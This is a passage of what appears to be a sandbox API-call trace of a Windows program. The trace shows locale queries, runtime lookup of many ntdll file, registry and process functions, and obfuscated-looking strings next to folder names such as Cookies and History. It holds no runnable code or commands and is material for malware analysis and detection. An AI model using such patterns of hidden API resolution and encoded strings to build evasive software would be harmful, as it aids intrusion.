Locale=0x409, LCType=0x35, lpLCData=0x6ef678, cchData=256 | out: lpLCData="Fri") returned 4 [0061.189] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x6ef678, cchData=256 | out: lpLCData="Friday") returned 7 [0061.189] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x6ef678, cchData=256 | out: lpLCData="Sat") returned 4 [0061.189] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x6ef678, cchData=256 | out: lpLCData="Saturday") returned 9 [0061.189] GetThreadLocale () returned 0x409 [0061.189] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x6ef6d4, cchData=256 | out: lpLCData="$") returned 2 [0061.189] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x6ef6d4, cchData=256 | out: lpLCData="0") returned 2 [0061.207] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x6ef6d4, cchData=256 | out: lpLCData="0") returned 2 [0061.207] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x6ef7cc, cchData=2 | out: lpLCData=",") returned 2 [0061.207] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x6ef7cc, cchData=2 | out: lpLCData=".") returned 2 [0061.207] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x6ef6d4, cchData=256 | out: lpLCData="2") returned 2 [0061.207] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x6ef7cc, cchData=2 | out: lpLCData="/") returned 2 [0061.207] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x6ef6d4, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0061.207] GetThreadLocale () returned 0x409 [0061.207] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x6ef6a0, cchData=256 | out: lpLCData="1") returned 2 [0061.207] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x6ef6d4, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0061.207] GetThreadLocale () returned 0x409 [0061.207] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x6ef6a0, cchData=256 | out: lpLCData="1") returned 2 [0061.207] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x6ef7cc, cchData=2 | out: lpLCData=":") returned 2 [0061.207] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x6ef6d4, cchData=256 | out: lpLCData="AM") returned 3 [0061.207] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x6ef6d4, cchData=256 | out: lpLCData="PM") returned 3 [0061.207] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x6ef6d4, cchData=256 | out: lpLCData="0") returned 2 [0061.207] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x6ef6d4, cchData=256 | out: lpLCData="0") returned 2 [0061.207] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x6ef6d4, cchData=256 | out: lpLCData="0") returned 2 [0061.207] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x6ef7cc, cchData=2 | out: lpLCData=",") returned 2 [0061.238] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x76e40000 [0061.238] GetProcAddress (hModule=0x76e40000, lpProcName="VariantChangeTypeEx") returned 0x76e44c28 [0061.238] GetProcAddress (hModule=0x76e40000, lpProcName="VarNeg") returned 0x76ebc802 [0061.239] GetProcAddress (hModule=0x76e40000, lpProcName="VarNot") returned 0x76ebec66 [0061.239] GetProcAddress (hModule=0x76e40000, lpProcName="VarAdd") returned 0x76e65934 [0061.239] GetProcAddress (hModule=0x76e40000, lpProcName="VarSub") returned 0x76ebd332 [0061.239] GetProcAddress (hModule=0x76e40000, lpProcName="VarMul") returned 0x76ebdbd4 [0061.239] GetProcAddress (hModule=0x76e40000, lpProcName="VarDiv") returned 0x76ebe405 [0061.239] GetProcAddress (hModule=0x76e40000, lpProcName="VarIdiv") returned 0x76ebf00a [0061.239] GetProcAddress (hModule=0x76e40000, lpProcName="VarMod") returned 0x76ebf15e [0061.239] GetProcAddress (hModule=0x76e40000, lpProcName="VarAnd") returned 0x76e65a98 [0061.239] GetProcAddress (hModule=0x76e40000, lpProcName="VarOr") returned 0x76ebecfa [0061.239] GetProcAddress (hModule=0x76e40000, lpProcName="VarXor") returned 0x76ebee2e [0061.239] GetProcAddress (hModule=0x76e40000, lpProcName="VarCmp") returned 0x76e5b0dc [0061.240] GetProcAddress (hModule=0x76e40000, lpProcName="VarI4FromStr") returned 0x76e56fab [0061.240] GetProcAddress (hModule=0x76e40000, lpProcName="VarR4FromStr") returned 0x76e601a0 [0061.240] GetProcAddress (hModule=0x76e40000, lpProcName="VarR8FromStr") returned 0x76e5699e [0061.240] GetProcAddress (hModule=0x76e40000, lpProcName="VarDateFromStr") returned 0x76e66ba7 [0061.240] GetProcAddress (hModule=0x76e40000, lpProcName="VarCyFromStr") returned 0x76e86c12 [0061.240] GetProcAddress (hModule=0x76e40000, lpProcName="VarBoolFromStr") returned 0x76e5dbd1 [0061.240] GetProcAddress (hModule=0x76e40000, lpProcName="VarBstrFromCy") returned 0x76e67fdc [0061.240] GetProcAddress (hModule=0x76e40000, lpProcName="VarBstrFromDate") returned 0x76e57a2a [0061.240] GetProcAddress (hModule=0x76e40000, lpProcName="VarBstrFromBool") returned 0x76e60355 [0061.280] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76620000 [0061.280] GetProcAddress (hModule=0x76620000, lpProcName="CoCreateInstanceEx") returned 0x76669d4e [0061.280] GetProcAddress (hModule=0x76620000, lpProcName="CoInitializeEx") returned 0x766609ad [0061.280] GetProcAddress (hModule=0x76620000, lpProcName="CoAddRefServerProcess") returned 0x76683cf3 [0061.280] GetProcAddress (hModule=0x76620000, lpProcName="CoReleaseServerProcess") returned 0x76684314 [0061.281] GetProcAddress (hModule=0x76620000, lpProcName="CoResumeClassObjects") returned 0x7662ea02 [0061.281] GetProcAddress (hModule=0x76620000, lpProcName="CoSuspendClassObjects") returned 0x7668bb02 [0061.357] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0x9c [0061.357] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xa0 [0061.357] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa4 [0061.638] QueryPerformanceCounter (in: lpPerformanceCount=0x6ef83c | out: lpPerformanceCount=0x6ef83c*=18200582390) returned 1 [0061.752] SysReAllocStringLen (in: pbstr=0x1f106c*=0x0, psz="%Local, ApplicationData FOLDER%", len=0x1f | out: pbstr=0x1f106c*="%Local, ApplicationData FOLDER%") returned 1 [0061.753] SysReAllocStringLen (in: pbstr=0x1f1068*=0x0, psz="%AllUsers, ApplicationData FOLDER%", len=0x22 | out: pbstr=0x1f1068*="%AllUsers, ApplicationData FOLDER%") returned 1 [0061.753] SysReAllocStringLen (in: pbstr=0x1f1064*=0x0, psz="%Temp FOLDER%", len=0xd | out: pbstr=0x1f1064*="%Temp FOLDER%") returned 1 [0061.753] SysReAllocStringLen (in: pbstr=0x1f1060*=0x0, psz="%ApplicationData FOLDER%", len=0x18 | out: pbstr=0x1f1060*="%ApplicationData FOLDER%") returned 1 [0061.753] SysReAllocStringLen (in: pbstr=0x1f105c*=0x0, psz="%InternetCache FOLDER%", len=0x16 | out: pbstr=0x1f105c*="%InternetCache FOLDER%") returned 1 [0061.753] SysReAllocStringLen (in: pbstr=0x1f1058*=0x0, psz="%Cookies FOLDER%", len=0x10 | out: pbstr=0x1f1058*="%Cookies FOLDER%") returned 1 [0061.753] SysReAllocStringLen (in: pbstr=0x1f1054*=0x0, psz="%History FOLDER%", len=0x10 | out: pbstr=0x1f1054*="%History FOLDER%") returned 1 [0061.753] SysReAllocStringLen (in: pbstr=0x1f1050*=0x0, psz="%My Pictures FOLDER%", len=0x14 | out: pbstr=0x1f1050*="%My Pictures FOLDER%") returned 1 [0061.753] SysReAllocStringLen (in: pbstr=0x1f104c*=0x0, psz="%AllUsers, Documents FOLDER%", len=0x1c | out: pbstr=0x1f104c*="%AllUsers, Documents FOLDER%") returned 1 [0061.753] SysReAllocStringLen (in: pbstr=0x1f1048*=0x0, psz="%Program Files, Common FOLDER%", len=0x1e | out: pbstr=0x1f1048*="%Program Files, Common FOLDER%") returned 1 [0061.753] SysReAllocStringLen (in: pbstr=0x1f1044*=0x0, psz="%Program Files FOLDER%", len=0x16 | out: pbstr=0x1f1044*="%Program Files FOLDER%") returned 1 [0061.753] SysReAllocStringLen (in: pbstr=0x1f1040*=0x0, psz="%My Documents FOLDER%", len=0x15 | out: pbstr=0x1f1040*="%My Documents FOLDER%") returned 1 [0061.753] SysReAllocStringLen (in: pbstr=0x1f103c*=0x0, psz="%WINDOWS FOLDER%", len=0x10 | out: pbstr=0x1f103c*="%WINDOWS FOLDER%") returned 1 [0061.753] SysReAllocStringLen (in: pbstr=0x1f1038*=0x0, psz="%SYSTEM FOLDER%", len=0xf | out: pbstr=0x1f1038*="%SYSTEM FOLDER%") returned 1 [0061.753] SysReAllocStringLen (in: pbstr=0x1f1034*=0x0, psz="%DEFAULT FOLDER%", len=0x10 | out: pbstr=0x1f1034*="%DEFAULT FOLDER%") returned 1 [0061.753] SysReAllocStringLen (in: pbstr=0x1f1020*=0x0, psz="af}l|}pvlv}w", len=0xc | out: pbstr=0x1f1020*="af}l|}pvlv}w") returned 1 [0061.753] SysReAllocStringLen (in: pbstr=0x1f0f04*=0x0, psz="af}l|}pvlqvtz}", len=0xe | out: pbstr=0x1f0f04*="af}l|}pvlqvtz}") returned 1 [0061.753] SysReAllocStringLen (in: pbstr=0x1f0de8*=0x0, psz="p{vpxlca|gvpgz|}lv}w", len=0x14 | out: pbstr=0x1f0de8*="p{vpxlca|gvpgz|}lv}w") returned 1 [0061.753] SysReAllocStringLen (in: pbstr=0x1f0ccc*=0x0, psz="p{vpxlca|gvpgz|}lqvtz}", len=0x16 | out: pbstr=0x1f0ccc*="p{vpxlca|gvpgz|}lqvtz}") returned 1 [0061.754] SysReAllocStringLen (in: pbstr=0x1f0bb0*=0x0, psz="e~lv}w\x02", len=0x7 | out: pbstr=0x1f0bb0*="e~lv}w\x02") returned 1 [0061.754] SysReAllocStringLen (in: pbstr=0x1f0a94*=0x0, psz="e~lqvtz}\x02", len=0x9 | out: pbstr=0x1f0a94*="e~lqvtz}\x02") returned 1 [0061.754] SysReAllocStringLen (in: pbstr=0x1f0978*=0x0, psz="e~lv}w", len=0x6 | out: pbstr=0x1f0978*="e~lv}w") returned 1 [0061.754] SysReAllocStringLen (in: pbstr=0x1f085c*=0x0, psz="e~lqvtz}", len=0x8 | out: pbstr=0x1f085c*="e~lqvtz}") returned 1 [0061.754] SysReAllocStringLen (in: pbstr=0x1f0740*=0x0, psz="f}ca|gvpgvwlv}w", len=0xf | out: pbstr=0x1f0740*="f}ca|gvpgvwlv}w") returned 1 [0061.754] SysReAllocStringLen (in: pbstr=0x1f0624*=0x0, psz="f}ca|gvpgvwlqvtz}", len=0x11 | out: pbstr=0x1f0624*="f}ca|gvpgvwlqvtz}") returned 1 [0061.754] SysReAllocStringLen (in: pbstr=0x1f0508*=0x0, psz="f}avtlpajcglv}w\x02\x05", len=0x11 | out: pbstr=0x1f0508*="f}avtlpajcglv}w\x02\x05") returned 1 [0061.754] SysReAllocStringLen (in: pbstr=0x1f03ec*=0x0, psz="f}avtlpajcglqvtz}\x02\x05", len=0x13 | out: pbstr=0x1f03ec*="f}avtlpajcglqvtz}\x02\x05") returned 1 [0061.754] SysReAllocStringLen (in: pbstr=0x1f02d0*=0x0, psz="f}avtlpajcglv}w\x02\x06", len=0x11 | out: pbstr=0x1f02d0*="f}avtlpajcglv}w\x02\x06") returned 1 [0061.869] SysReAllocStringLen (in: pbstr=0x1f01b4*=0x0, psz="f}avtlpajcglqvtz}\x02\x06", len=0x13 | out: pbstr=0x1f01b4*="f}avtlpajcglqvtz}\x02\x06") returned 1 [0061.869] SysReAllocStringLen (in: pbstr=0x1f0098*=0x0, psz="f}avtlpajcglv}w\x02\x07", len=0x11 | out: pbstr=0x1f0098*="f}avtlpajcglv}w\x02\x07") returned 1 [0061.869] SysReAllocStringLen (in: pbstr=0x1eff7c*=0x0, psz="f}avtlpajcglqvtz}\x02\x07", len=0x13 | out: pbstr=0x1eff7c*="f}avtlpajcglqvtz}\x02\x07") returned 1 [0061.869] SysReAllocStringLen (in: pbstr=0x1efe60*=0x0, psz="f}avtlpajcglv}w\x02", len=0x11 | out: pbstr=0x1efe60*="f}avtlpajcglv}w\x02") returned 1 [0061.869] SysReAllocStringLen (in: pbstr=0x1efd44*=0x0, psz="f}avtlpajcglqvtz}\x02", len=0x13 | out: pbstr=0x1efd44*="f}avtlpajcglqvtz}\x02") returned 1 [0061.869] SysReAllocStringLen (in: pbstr=0x1efc28*=0x0, psz="f}avtlpajcglv}w\x02\x01", len=0x11 | out: pbstr=0x1efc28*="f}avtlpajcglv}w\x02\x01") returned 1 [0061.869] SysReAllocStringLen (in: pbstr=0x1efb0c*=0x0, psz="f}avtlpajcglqvtz}\x02\x01", len=0x13 | out: pbstr=0x1efb0c*="f}avtlpajcglqvtz}\x02\x01") returned 1 [0061.869] SysReAllocStringLen (in: pbstr=0x1ef9f0*=0x0, psz="f}avtlpajcglv}w\x02\x02", len=0x11 | out: pbstr=0x1ef9f0*="f}avtlpajcglv}w\x02\x02") returned 1 [0061.869] SysReAllocStringLen (in: pbstr=0x1ef8d4*=0x0, psz="f}avtlpajcglqvtz}\x02\x02", len=0x13 | out: pbstr=0x1ef8d4*="f}avtlpajcglqvtz}\x02\x02") returned 1 [0061.869] SysReAllocStringLen (in: pbstr=0x1ef7b8*=0x0, psz="f}avtlpajcglv}w\x02\x03", len=0x11 | out: pbstr=0x1ef7b8*="f}avtlpajcglv}w\x02\x03") returned 1 [0061.869] SysReAllocStringLen (in: pbstr=0x1ef69c*=0x0, psz="f}avtlpajcglqvtz}\x02\x03", len=0x13 | out: pbstr=0x1ef69c*="f}avtlpajcglqvtz}\x02\x03") returned 1 [0061.869] SysReAllocStringLen (in: pbstr=0x1ef580*=0x0, psz="f}avtlpajcglv}w\n", len=0x10 | out: pbstr=0x1ef580*="f}avtlpajcglv}w\n") returned 1 [0061.869] SysReAllocStringLen (in: pbstr=0x1ef464*=0x0, psz="f}avtlpajcglqvtz}\n", len=0x12 | out: pbstr=0x1ef464*="f}avtlpajcglqvtz}\n") returned 1 [0061.870] SysReAllocStringLen (in: pbstr=0x1ef348*=0x0, psz="f}avtlpajcglv}w\x0b", len=0x10 | out: pbstr=0x1ef348*="f}avtlpajcglv}w\x0b") returned 1 [0061.870] SysReAllocStringLen (in: pbstr=0x1ef22c*=0x0, psz="f}avtlpajcglqvtz}\x0b", len=0x12 | out: pbstr=0x1ef22c*="f}avtlpajcglqvtz}\x0b") returned 1 [0061.870] SysReAllocStringLen (in: pbstr=0x1ef110*=0x0, psz="f}avtlpajcglv}w\x04", len=0x10 | out: pbstr=0x1ef110*="f}avtlpajcglv}w\x04") returned 1 [0061.870] SysReAllocStringLen (in: pbstr=0x1eeff4*=0x0, psz="f}avtlpajcglqvtz}\x04", len=0x12 | out: pbstr=0x1eeff4*="f}avtlpajcglqvtz}\x04") returned 1 [0061.870] SysReAllocStringLen (in: pbstr=0x1eeed8*=0x0, psz="f}avtlpajcglv}w\x05", len=0x10 | out: pbstr=0x1eeed8*="f}avtlpajcglv}w\x05") returned 1 [0061.870] SysReAllocStringLen (in: pbstr=0x1eedbc*=0x0, psz="f}avtlpajcglqvtz}\x05", len=0x12 | out: pbstr=0x1eedbc*="f}avtlpajcglqvtz}\x05") returned 1 [0061.870] SysReAllocStringLen (in: pbstr=0x1eeca0*=0x0, psz="f}avtlpajcglv}w\x06", len=0x10 | out: pbstr=0x1eeca0*="f}avtlpajcglv}w\x06") returned 1 [0061.870] SysReAllocStringLen (in: pbstr=0x1eeb84*=0x0, psz="f}avtlpajcglqvtz}\x06", len=0x12 | out: pbstr=0x1eeb84*="f}avtlpajcglqvtz}\x06") returned 1 [0061.870] SysReAllocStringLen (in: pbstr=0x1eea68*=0x0, psz="f}avtlpajcglv}w\x07", len=0x10 | out: pbstr=0x1eea68*="f}avtlpajcglv}w\x07") returned 1 [0061.870] SysReAllocStringLen (in: pbstr=0x1ee94c*=0x0, psz="f}avtlpajcglqvtz}\x07", len=0x12 | out: pbstr=0x1ee94c*="f}avtlpajcglqvtz}\x07") returned 1 [0061.870] SysReAllocStringLen (in: pbstr=0x1ee830*=0x0, psz="f}avtlpajcglv}w", len=0x10 | out: pbstr=0x1ee830*="f}avtlpajcglv}w") returned 1 [0061.870] SysReAllocStringLen (in: pbstr=0x1ee714*=0x0, psz="f}avtlpajcglqvtz}", len=0x12 | out: pbstr=0x1ee714*="f}avtlpajcglqvtz}") returned 1 [0061.870] SysReAllocStringLen (in: pbstr=0x1ee5f8*=0x0, psz="f}avtlpajcglv}w\x01", len=0x10 | out: pbstr=0x1ee5f8*="f}avtlpajcglv}w\x01") returned 1 [0061.870] SysReAllocStringLen (in: pbstr=0x1ee4dc*=0x0, psz="f}avtlpajcglqvtz}\x01", len=0x12 | out: pbstr=0x1ee4dc*="f}avtlpajcglqvtz}\x01") returned 1 [0061.870] SysReAllocStringLen (in: pbstr=0x1ee3c0*=0x0, psz="f}avtlpajcglv}w\x02", len=0x10 | out: pbstr=0x1ee3c0*="f}avtlpajcglv}w\x02") returned 1 [0061.870] SysReAllocStringLen (in: pbstr=0x1ee2a4*=0x0, psz="f}avtlpajcglqvtz}\x02", len=0x12 | out: pbstr=0x1ee2a4*="f}avtlpajcglqvtz}\x02") returned 1 [0061.870] SysReAllocStringLen (in: pbstr=0x1ee188*=0x0, psz="wvpajcgl|}lvkvpfgvlv}w", len=0x16 | out: pbstr=0x1ee188*="wvpajcgl|}lvkvpfgvlv}w") returned 1 [0061.870] SysReAllocStringLen (in: pbstr=0x1ee06c*=0x0, psz="wvpajcgl|}lvkvpfgvlqvtz}", len=0x18 | out: pbstr=0x1ee06c*="wvpajcgl|}lvkvpfgvlqvtz}") returned 1 [0061.870] SysReAllocStringLen (in: pbstr=0x1edf50*=0x0, psz="avtlpajcglv}w\x02\x05", len=0xf | out: pbstr=0x1edf50*="avtlpajcglv}w\x02\x05") returned 1 [0061.870] SysReAllocStringLen (in: pbstr=0x1ede34*=0x0, psz="avtlpajcglqvtz}\x02\x05", len=0x11 | out: pbstr=0x1ede34*="avtlpajcglqvtz}\x02\x05") returned 1 [0061.870] SysReAllocStringLen (in: pbstr=0x1edd18*=0x0, psz="avtlpajcglv}w\x02\x06", len=0xf | out: pbstr=0x1edd18*="avtlpajcglv}w\x02\x06") returned 1 [0061.870] SysReAllocStringLen (in: pbstr=0x1edbfc*=0x0, psz="avtlpajcglqvtz}\x02\x06", len=0x11 | out: pbstr=0x1edbfc*="avtlpajcglqvtz}\x02\x06") returned 1 [0061.870] SysReAllocStringLen (in: pbstr=0x1edae0*=0x0, psz="avtlpajcglv}w\x02\x07", len=0xf | out: pbstr=0x1edae0*="avtlpajcglv}w\x02\x07") returned 1 [0061.870] SysReAllocStringLen (in: pbstr=0x1ed9c4*=0x0, psz="avtlpajcglqvtz}\x02\x07", len=0x11 | out: pbstr=0x1ed9c4*="avtlpajcglqvtz}\x02\x07") returned 1 [0061.871] SysReAllocStringLen (in: pbstr=0x1ed8a8*=0x0, psz="avtlpajcglv}w\x02", len=0xf | out: pbstr=0x1ed8a8*="avtlpajcglv}w\x02") returned 1 [0061.871] SysReAllocStringLen (in: pbstr=0x1ed78c*=0x0, psz="avtlpajcglqvtz}\x02", len=0x11 | out: pbstr=0x1ed78c*="avtlpajcglqvtz}\x02") returned 1 [0061.871] SysReAllocStringLen (in: pbstr=0x1ed670*=0x0, psz="avtlpajcglv}w\x02\x01", len=0xf | out: pbstr=0x1ed670*="avtlpajcglv}w\x02\x01") returned 1 [0061.871] SysReAllocStringLen (in: pbstr=0x1ed554*=0x0, psz="avtlpajcglqvtz}\x02\x01", len=0x11 | out: pbstr=0x1ed554*="avtlpajcglqvtz}\x02\x01") returned 1 [0061.871] SysReAllocStringLen (in: pbstr=0x1ed438*=0x0, psz="avtlpajcglv}w\x02\x02", len=0xf | out: pbstr=0x1ed438*="avtlpajcglv}w\x02\x02") returned 1 [0061.871] SysReAllocStringLen (in: pbstr=0x1ed31c*=0x0, psz="avtlpajcglqvtz}\x02\x02", len=0x11 | out: pbstr=0x1ed31c*="avtlpajcglqvtz}\x02\x02") returned 1 [0061.871] SysReAllocStringLen (in: pbstr=0x1ed200*=0x0, psz="avtlpajcglv}w\x02\x03", len=0xf | out: pbstr=0x1ed200*="avtlpajcglv}w\x02\x03") returned 1 [0061.871] SysReAllocStringLen (in: pbstr=0x1ed0e4*=0x0, psz="avtlpajcglqvtz}\x02\x03", len=0x11 | out: pbstr=0x1ed0e4*="avtlpajcglqvtz}\x02\x03") returned 1 [0061.871] SysReAllocStringLen (in: pbstr=0x1ecfc8*=0x0, psz="avtlpajcglv}w\n", len=0xe | out: pbstr=0x1ecfc8*="avtlpajcglv}w\n") returned 1 [0061.871] SysReAllocStringLen (in: pbstr=0x1eceac*=0x0, psz="avtlpajcglqvtz}\n", len=0x10 | out: pbstr=0x1eceac*="avtlpajcglqvtz}\n") returned 1 [0061.871] SysReAllocStringLen (in: pbstr=0x1ecd90*=0x0, psz="avtlpajcglv}w\x0b", len=0xe | out: pbstr=0x1ecd90*="avtlpajcglv}w\x0b") returned 1 [0061.871] SysReAllocStringLen (in: pbstr=0x1ecc74*=0x0, psz="avtlpajcglqvtz}\x0b", len=0x10 | out: pbstr=0x1ecc74*="avtlpajcglqvtz}\x0b") returned 1 [0061.871] SysReAllocStringLen (in: pbstr=0x1ecb58*=0x0, psz="avtlpajcglv}w\x04", len=0xe | out: pbstr=0x1ecb58*="avtlpajcglv}w\x04") returned 1 [0061.871] SysReAllocStringLen (in: pbstr=0x1eca3c*=0x0, psz="avtlpajcglqvtz}\x04", len=0x10 | out: pbstr=0x1eca3c*="avtlpajcglqvtz}\x04") returned 1 [0061.871] SysReAllocStringLen (in: pbstr=0x1ec920*=0x0, psz="avtlpajcglv}w\x05", len=0xe | out: pbstr=0x1ec920*="avtlpajcglv}w\x05") returned 1 [0061.871] SysReAllocStringLen (in: pbstr=0x1ec804*=0x0, psz="avtlpajcglqvtz}\x05", len=0x10 | out: pbstr=0x1ec804*="avtlpajcglqvtz}\x05") returned 1 [0061.871] SysReAllocStringLen (in: pbstr=0x1ec6e8*=0x0, psz="avtlpajcglv}w\x06", len=0xe | out: pbstr=0x1ec6e8*="avtlpajcglv}w\x06") returned 1 [0061.871] SysReAllocStringLen (in: pbstr=0x1ec5cc*=0x0, psz="avtlpajcglqvtz}\x06", len=0x10 | out: pbstr=0x1ec5cc*="avtlpajcglqvtz}\x06") returned 1 [0061.871] SysReAllocStringLen (in: pbstr=0x1ec4b0*=0x0, psz="avtlpajcglv}w\x07", len=0xe | out: pbstr=0x1ec4b0*="avtlpajcglv}w\x07") returned 1 [0061.871] SysReAllocStringLen (in: pbstr=0x1ec394*=0x0, psz="avtlpajcglqvtz}\x07", len=0x10 | out: pbstr=0x1ec394*="avtlpajcglqvtz}\x07") returned 1 [0061.871] SysReAllocStringLen (in: pbstr=0x1ec278*=0x0, psz="avtlpajcglv}w", len=0xe | out: pbstr=0x1ec278*="avtlpajcglv}w") returned 1 [0061.872] SysReAllocStringLen (in: pbstr=0x1ec15c*=0x0, psz="avtlpajcglqvtz}", len=0x10 | out: pbstr=0x1ec15c*="avtlpajcglqvtz}") returned 1 [0061.872] SysReAllocStringLen (in: pbstr=0x1ec040*=0x0, psz="avtlpajcglv}w\x01", len=0xe | out: pbstr=0x1ec040*="avtlpajcglv}w\x01") returned 1 [0061.872] SysReAllocStringLen (in: pbstr=0x1ebf24*=0x0, psz="avtlpajcglqvtz}\x01", len=0x10 | out: pbstr=0x1ebf24*="avtlpajcglqvtz}\x01") returned 1 [0061.872] SysReAllocStringLen (in: pbstr=0x1ebe08*=0x0, psz="avtlpajcglv}w\x02", len=0xe | out: pbstr=0x1ebe08*="avtlpajcglv}w\x02") returned 1 [0061.872] SysReAllocStringLen (in: pbstr=0x1ebcec*=0x0, psz="avtlpajcglqvtz}\x02", len=0x10 | out: pbstr=0x1ebcec*="avtlpajcglqvtz}\x02") returned 1 [0061.910] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0061.910] GetProcAddress (hModule=0x77c40000, lpProcName="ZwClose") returned 0x77c5f9d0 [0061.910] GetProcAddress (hModule=0x77c40000, lpProcName="ZwSetInformationFile") returned 0x77c5fc28 [0061.911] GetProcAddress (hModule=0x77c40000, lpProcName="ZwQueryInformationFile") returned 0x77c5fa00 [0061.911] GetProcAddress (hModule=0x77c40000, lpProcName="ZwReadFile") returned 0x77c5f8e0 [0061.911] GetProcAddress (hModule=0x77c40000, lpProcName="ZwCreateFile") returned 0x77c600a4 [0061.911] GetProcAddress (hModule=0x77c40000, lpProcName="ZwOpenFile") returned 0x77c5fd54 [0061.911] GetProcAddress (hModule=0x77c40000, lpProcName="ZwQueryAttributesFile") returned 0x77c5fe4c [0061.911] GetProcAddress (hModule=0x77c40000, lpProcName="ZwCreateSection") returned 0x77c5ff94 [0061.911] GetProcAddress (hModule=0x77c40000, lpProcName="ZwMapViewOfSection") returned 0x77c5fc40 [0061.911] GetProcAddress (hModule=0x77c40000, lpProcName="ZwQuerySection") returned 0x77c60040 [0061.911] GetProcAddress (hModule=0x77c40000, lpProcName="ZwUnmapViewOfSection") returned 0x77c5fc70 [0061.911] GetProcAddress (hModule=0x77c40000, lpProcName="ZwQueryFullAttributesFile") returned 0x77c6132c [0061.911] GetProcAddress (hModule=0x77c40000, lpProcName="ZwWriteFile") returned 0x77c5f918 [0061.911] GetProcAddress (hModule=0x77c40000, lpProcName="ZwQueryObject") returned 0x77c5f9e8 [0061.912] GetProcAddress (hModule=0x77c40000, lpProcName="ZwQueryDirectoryFile") returned 0x77c5fd88 [0061.912] GetProcAddress (hModule=0x77c40000, lpProcName="ZwOpenSection") returned 0x77c5fdb8 [0061.912] GetProcAddress (hModule=0x77c40000, lpProcName="ZwDuplicateObject") returned 0x77c5fe34 [0061.912] GetProcAddress (hModule=0x77c40000, lpProcName="ZwQueryVolumeInformationFile") returned 0x77c5ff7c [0061.912] GetProcAddress (hModule=0x77c40000, lpProcName="ZwDeleteFile") returned 0x77c609d4 [0061.912] GetProcAddress (hModule=0x77c40000, lpProcName="ZwLockFile") returned 0x77c60e44 [0061.912] GetProcAddress (hModule=0x77c40000, lpProcName="ZwUnlockFile") returned 0x77c61ea8 [0061.912] GetProcAddress (hModule=0x77c40000, lpProcName="ZwTerminateProcess") returned 0x77c5fca0 [0061.912] GetProcAddress (hModule=0x77c40000, lpProcName="ZwOpenKey") returned 0x77c5fa18 [0061.912] GetProcAddress (hModule=0x77c40000, lpProcName="ZwEnumerateValueKey") returned 0x77c5fa30 [0061.912] GetProcAddress (hModule=0x77c40000, lpProcName="ZwQueryKey") returned 0x77c5fa80 [0061.912] GetProcAddress (hModule=0x77c40000, lpProcName="ZwQueryValueKey") returned 0x77c5fa98 [0061.913] GetProcAddress (hModule=0x77c40000, lpProcName="ZwCreateKey") returned 0x77c5fb30 [0061.913] GetProcAddress (hModule=0x77c40000, lpProcName="ZwEnumerateKey") returned 0x77c5fd3c [0061.913] GetProcAddress (hModule=0x77c40000, lpProcName="ZwSetValueKey") returned 0x77c601b4 [0061.913] GetProcAddress (hModule=0x77c40000, lpProcName="ZwDeleteKey") returned 0x77c609ec [0061.913] GetProcAddress (hModule=0x77c40000, lpProcName="ZwDeleteValueKey") returned 0x77c60a34 [0061.913] GetProcAddress (hModule=0x77c40000, lpProcName="ZwFlushKey") returned 0x77c60b70 [0061.913] GetProcAddress (hModule=0x77c40000, lpProcName="ZwLoadKey") returned 0x77c60dfc [0061.913] GetProcAddress (hModule=0x77c40000, lpProcName="ZwLoadKey2") returned 0x77c60e14 [0061.913] GetProcAddress (hModule=0x77c40000, lpProcName="ZwNotifyChangeKey") returned 0x77c60f60 [0061.913] GetProcAddress (hModule=0x77c40000, lpProcName="ZwQueryMultipleValueKey") returned 0x77c6146c [0061.913] GetProcAddress (hModule=0x77c40000, lpProcName="ZwReplaceKey") returned 0x77c61738 [0061.913] GetProcAddress (hModule=0x77c40000, lpProcName="ZwRestoreKey") returned 0x77c617d0 [0061.914] GetProcAddress (hModule=0x77c40000, lpProcName="ZwSaveKey") returned 0x77c61864 [0061.914] GetProcAddress (hModule=0x77c40000, lpProcName="ZwSetInformationKey") returned 0x77c61a48 [0061.914] GetProcAddress (hModule=0x77c40000, lpProcName="ZwUnloadKey") returned 0x77c61e60 [0061.914] GetProcAddress (hModule=0x77c40000, lpProcName="ZwAccessCheck") returned 0x77c60218 [0061.914] GetProcAddress (hModule=0x77c40000, lpProcName="ZwExtendSection") returned 0x77c60b0c [0061.914] GetProcAddress (hModule=0x77c40000, lpProcName="ZwFlushBuffersFile") returned 0x77c5ffac [0061.914] GetProcAddress (hModule=0x77c40000, lpProcName="ZwFsControlFile") returned 0x77c5fde8 [0061.914] GetProcAddress (hModule=0x77c40000, lpProcName="ZwNotifyChangeDirectoryFile") returned 0x77c60f48 [0061.914] GetProcAddress (hModule=0x77c40000, lpProcName="ZwQuerySecurityObject") returned 0x77c61518 [0061.914] GetProcAddress 